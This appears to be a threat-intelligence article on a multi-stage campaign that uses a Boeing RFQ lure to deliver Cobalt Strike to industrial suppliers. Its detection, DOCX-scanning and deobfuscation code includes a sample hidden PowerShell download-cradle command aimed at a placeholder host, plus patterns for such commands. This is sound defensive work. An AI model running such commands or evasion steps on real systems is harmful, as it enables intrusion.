Malware Campaign Uses Boeing RFQ Lure to Target Industrial Suppliers with Multi-Stage Attack

Sophisticated Malware Campaign Targets Industrial Suppliers with Boeing RFQ Lure

In a recent and highly sophisticated cyberattack, threat actors have orchestrated a six-stage malware campaign targeting industrial suppliers and procurement teams. Disguised as a legitimate Request for Quotation (RFQ) from Boeing, the attack employs a complex sequence of malicious components, including DOCX, RTF, JavaScript, PowerShell, Python, and encrypted DLLs, culminating in the deployment of Cobalt Strike—a potent post-exploitation tool—entirely within the system’s memory.

Initial Deception: The Boeing RFQ Lure

The attack begins with a seemingly innocuous email, purportedly from Joyce Malave at Boeing, requesting quotations for high-quantity orders. The email includes an attached Word document with filenames such as Rfq and Payment Schedule.docx, Product_specifications.docx, or RFQ_PO_ATR29026II.docx. These documents are crafted to appear authentic, leveraging social engineering tactics to entice recipients into opening them.

Stage 1: Embedded RTF Exploit

Upon opening the DOCX file, an embedded RTF document is automatically loaded through a hidden relationship reference. This technique, known as aFChunk, forces Microsoft Word to process the embedded RTF without user interaction. The RTF file contains a hex-encoded JavaScript payload concealed within control words, ensuring that the malicious code remains hidden from the user.
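The hidden relationship that pulls an RTF part into a DOCX is visible in the package itself, so a triage script can flag it before the document ever reaches Word. The following is an added example, not code from the original report: it builds a constructed minimal DOCX whose body references an RTF part through `w:altChunk` (the relationship type behind it ends in `/aFChunk`), then scans the package for such relationships and reports whether the target actually begins with the RTF signature. The sample document and its text are constructed; the scanner only reads the zip and its XML and never renders anything.

```python
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ALTCHUNK_REL = R_NS + "/aFChunk"  # relationship type used by <w:altChunk>


def find_altchunks(docx_bytes: bytes) -> list:
    """Report every altChunk relationship in a DOCX package.

    Each finding records the relationship id, its target part, whether the
    document body actually references it via <w:altChunk r:id=...>, whether
    the target lies outside the package, and whether the part starts with
    the RTF magic '{\\rtf'.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        if "word/_rels/document.xml.rels" not in names:
            return findings
        rels = ET.fromstring(zf.read("word/_rels/document.xml.rels"))
        referenced = set()
        if "word/document.xml" in names:
            doc = ET.fromstring(zf.read("word/document.xml"))
            for chunk in doc.iter(f"{{{WORD_NS}}}altChunk"):
                referenced.add(chunk.get(f"{{{R_NS}}}id"))
        for rel in rels.iter(f"{{{RELS_NS}}}Relationship"):
            if rel.get("Type") != ALTCHUNK_REL:
                continue
            target = rel.get("Target", "")
            external = rel.get("TargetMode") == "External"
            head = b""
            if not external:
                # Internal targets are resolved relative to word/ unless absolute.
                part = posixpath.normpath(posixpath.join("word", target)).lstrip("/")
                if part in names:
                    head = zf.read(part)[:5]
            findings.append({
                "id": rel.get("Id"),
                "target": target,
                "external": external,
                "referenced_in_body": rel.get("Id") in referenced,
                "is_rtf": head.startswith(b"{\\rtf"),
            })
    return findings


def build_sample_docx(include_altchunk: bool = True) -> bytes:
    """Constructed minimal DOCX; with include_altchunk the body pulls in an RTF part."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Default Extension="rtf" ContentType="application/rtf"/>'
        '</Types>'
    )
    body = "<w:p><w:r><w:t>Request for Quotation</w:t></w:r></w:p>"
    rel = ""
    if include_altchunk:
        body += '<w:altChunk r:id="rId1"/>'
        rel = f'<Relationship Id="rId1" Type="{ALTCHUNK_REL}" Target="embedded.rtf"/>'
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<w:document xmlns:w="{WORD_NS}" xmlns:r="{R_NS}">'
        f"<w:body>{body}</w:body></w:document>"
    )
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{RELS_NS}">{rel}</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", rels)
        if include_altchunk:
            # Constructed RTF text standing in for the embedded part; no payload.
            zf.writestr("word/embedded.rtf", b"{\\rtf1\\ansi Constructed sample, not a payload.}")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in find_altchunks(build_sample_docx()):
        print(finding)
```

A legitimate document rarely carries an altChunk relationship at all, and one whose target is an RTF part (or an external URL) is a strong triage signal; a mail gateway or sandbox can reject or quarantine on that alone, independent of whatever the RTF contains.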

Stage 2: JavaScript Dropper Activation

The embedded JavaScript, approximately 67 KB in size, employs obfuscation techniques such as junk strings to evade detection. It utilizes Windows Management Instrumentation (WMI) to silently execute a PowerShell script in a hidden window, maintaining stealth throughout the process.

Stage 3: PowerShell Script Execution

The PowerShell script is designed to disable TLS certificate checks and bypass Windows’ Antimalware Scan Interface (AMSI) using indirect method calls. It then downloads a 14.5 MB ZIP file from Filemail.com, a legitimate Norwegian file-sharing service, exploiting its clean domain reputation to avoid raising red flags.
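Stages 2 and 3 leave a recognisable shape in process-creation telemetry: a process created through WMI runs under the WMI provider host (WmiPrvSE.exe), and the PowerShell it launches asks for a hidden window, an execution-policy bypass and a download. The following is an added detection example, not code from the original report: it evaluates constructed Sysmon Event ID 1 style records (Image, ParentImage, CommandLine) against those signals and raises an alert only when several coincide, so that ordinary WMI-driven administration is not flagged on the parent alone. The records, the placeholder host `example.invalid` and the encoded-command string are constructed.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 (process creation) style records; not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # WMI-spawned hidden PowerShell with policy bypass and a download cradle
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -Ep Bypass -c \"(New-Object Net.WebClient)"
                       ".DownloadFile('https://example.invalid/a.mp3', 'C:\\Users\\Public\\a.zip')\"",
    },
    {   # interactive PowerShell started from Explorer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -NoExit -Command Get-ChildItem C:\\Projects",
    },
    {   # legitimate-looking WMI-driven administration: parent alone is not enough
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": 'powershell.exe -Command "Get-Service spooler | Restart-Service"',
    },
    {   # hidden window plus encoded command (constructed base64 of UTF-16LE "AAAAA")
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "pwsh.exe -w hidden -enc QQBBAEEAQQBBAA==",
    },
]

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{12,}", re.I)
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient", re.I)


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the reasons a process-creation event resembles a WMI-launched PowerShell stage."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if image not in {"powershell.exe", "pwsh.exe"}:
        return reasons
    if parent == "wmiprvse.exe":
        reasons.append("spawned by the WMI provider host (process created via WMI)")
    if HIDDEN.search(cmd):
        reasons.append("hidden window requested")
    if BYPASS.search(cmd):
        reasons.append("execution policy bypass")
    if ENCODED.search(cmd):
        reasons.append("encoded command")
    if DOWNLOAD.search(cmd):
        reasons.append("download cradle on the command line")
    return reasons


def detect(events: List[Dict[str, str]], threshold: int = 2) -> List[dict]:
    """Alert on events that accumulate at least `threshold` independent signals."""
    alerts = []
    for idx, ev in enumerate(events):
        reasons = evaluate(ev)
        if len(reasons) >= threshold:
            alerts.append({"index": idx, "parent": ev["ParentImage"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The threshold is the important design choice: the third record shows that a WmiPrvSE.exe parent by itself is common in managed environments, while the first record shows the combination the report describes (WMI parent, hidden window, bypass, download) and scores on all four signals. Tune the threshold against your own baseline before turning the rule on.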

Stage 4: Deployment of Python Runtime

The downloaded ZIP file, masquerading as an .mp3 file, contains a complete Python 3.12 runtime. This runtime is extracted and used to execute a script named Protected.py, which is 392 lines long and responsible for further stages of the attack.

Stage 5: Multi-Layered Obfuscation and Decryption

Protected.py employs multiple layers of obfuscation, including Base64 encoding, zlib compression, byte reversal, ROT13, and XOR operations. After stripping these layers, the script decrypts a file named license.pdf with AES-256-CBC. Despite its name, license.pdf is not a document but an encrypted DLL.
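Peeling layers like these is routine analyst work once the order of operations has been read out of the script, and the XOR layer in particular yields to a known-plaintext check when it wraps a zlib stream. The following is an added example, not the report's or the malware's code: it builds a constructed blob with the five layers named above in an assumed order (reverse, zlib, XOR, Base64, ROT13), then unwraps it, recovering the XOR key by brute force under the assumption of a single-byte key, using the zlib header byte 0x78 and a successful inflate as the oracle. The inner content is a constructed placeholder; the AES-256-CBC step that follows in the real chain is outside this example.

```python
import base64
import codecs
import zlib
from typing import Optional, Tuple

# Constructed stand-in for the inner stage; the real Protected.py content is not reproduced.
INNER_STAGE = b"# constructed placeholder for the next stage\nprint('decrypt license.pdf')\n"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def rot13(data: bytes) -> bytes:
    """ROT13 over ASCII letters only; every other byte passes through unchanged."""
    return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")


def wrap(inner: bytes, key: bytes) -> bytes:
    """Apply the five layers in the assumed order a loader author would use."""
    step = inner[::-1]              # 1. byte reversal
    step = zlib.compress(step)      # 2. zlib
    step = xor_bytes(step, key)     # 3. XOR with the key
    step = base64.b64encode(step)   # 4. Base64
    return rot13(step)              # 5. ROT13 over the Base64 text


def recover_single_byte_xor_key(data: bytes) -> bytes:
    """Brute-force a one-byte XOR key (assumed length) using the zlib header
    as known plaintext: only the right key yields 0x78 as the first byte
    and a stream that actually inflates."""
    for k in range(256):
        candidate = xor_bytes(data, bytes([k]))
        if candidate[0] == 0x78:
            try:
                zlib.decompress(candidate)
                return bytes([k])
            except zlib.error:
                continue
    raise ValueError("no single-byte key produced a valid zlib stream")


def unwrap(blob: bytes, key: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Strip the layers in reverse order; returns (key used, recovered inner stage)."""
    step = rot13(blob)                      # undo 5 (ROT13 is its own inverse)
    step = base64.b64decode(step)           # undo 4
    if key is None:
        key = recover_single_byte_xor_key(step)
    step = xor_bytes(step, key)             # undo 3
    step = zlib.decompress(step)            # undo 2
    return key, step[::-1]                  # undo 1


if __name__ == "__main__":
    blob = wrap(INNER_STAGE, b"\x5a")
    key, inner = unwrap(blob)
    print("recovered key:", key.hex())
    print(inner.decode())
```

The oracle is the point worth keeping: whenever an XOR layer sits directly over a compressed or well-known format (zlib, PE, ZIP), the format's magic bytes give the key for free up to the length of the known prefix, and the decompress-or-fail check removes false positives.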

Stage 6: Reflective DLL Loading and Cobalt Strike Deployment

The decrypted DLL is reflectively loaded into the system’s memory, a technique that allows the execution of code without writing it to disk, thereby evading traditional file-based detection methods. This DLL serves as a loader for Cobalt Strike, granting attackers full interactive access to the compromised machine. With Cobalt Strike running entirely in memory, threat actors can perform data theft, lateral movement within the network, and further system compromises without leaving significant traces.

Campaign Scope and Impact

The campaign, identified as NKFZ5966PURCHASE, was first detected on March 30, 2026, when security researcher @JAMESWT_WT flagged a suspicious DOCX file on X (formerly Twitter). Subsequent analysis revealed at least 22 linked malware samples, with some payload delivery URLs remaining active at the time of discovery. The consistent use of legitimate tools and services throughout the attack chain—including Microsoft Word, PowerShell, a signed Python binary, and trusted file-sharing platforms—renders detection by conventional endpoint security solutions exceedingly challenging.

Mitigation Strategies

To defend against such sophisticated attacks, organizations should implement the following measures:

1. User Education and Awareness: Train employees to recognize phishing attempts and the risks associated with opening unsolicited email attachments, even from seemingly legitimate sources.

2. Email Filtering and Scanning: Deploy advanced email security solutions capable of detecting and blocking malicious attachments and embedded threats.

3. Endpoint Detection and Response (EDR): Utilize EDR solutions that monitor for suspicious behaviors, such as unusual script executions or memory-only payloads.

4. Regular Software Updates: Ensure that all software, including Microsoft Office and security tools, is up to date with the latest patches to mitigate known vulnerabilities.

5. Network Segmentation: Implement network segmentation to limit the spread of malware and restrict unauthorized access to sensitive systems.

6. Behavioral Analysis: Employ behavioral analysis tools to detect anomalies indicative of advanced persistent threats (APTs) and other sophisticated attack vectors.

Conclusion

The NKFZ5966PURCHASE campaign underscores the evolving complexity of cyber threats targeting industrial sectors. By leveraging a multi-stage attack chain that exploits trusted tools and services, attackers can infiltrate systems with minimal detection. Organizations must adopt a multi-layered security approach, combining user education, advanced detection technologies, and proactive threat hunting to effectively combat such sophisticated threats.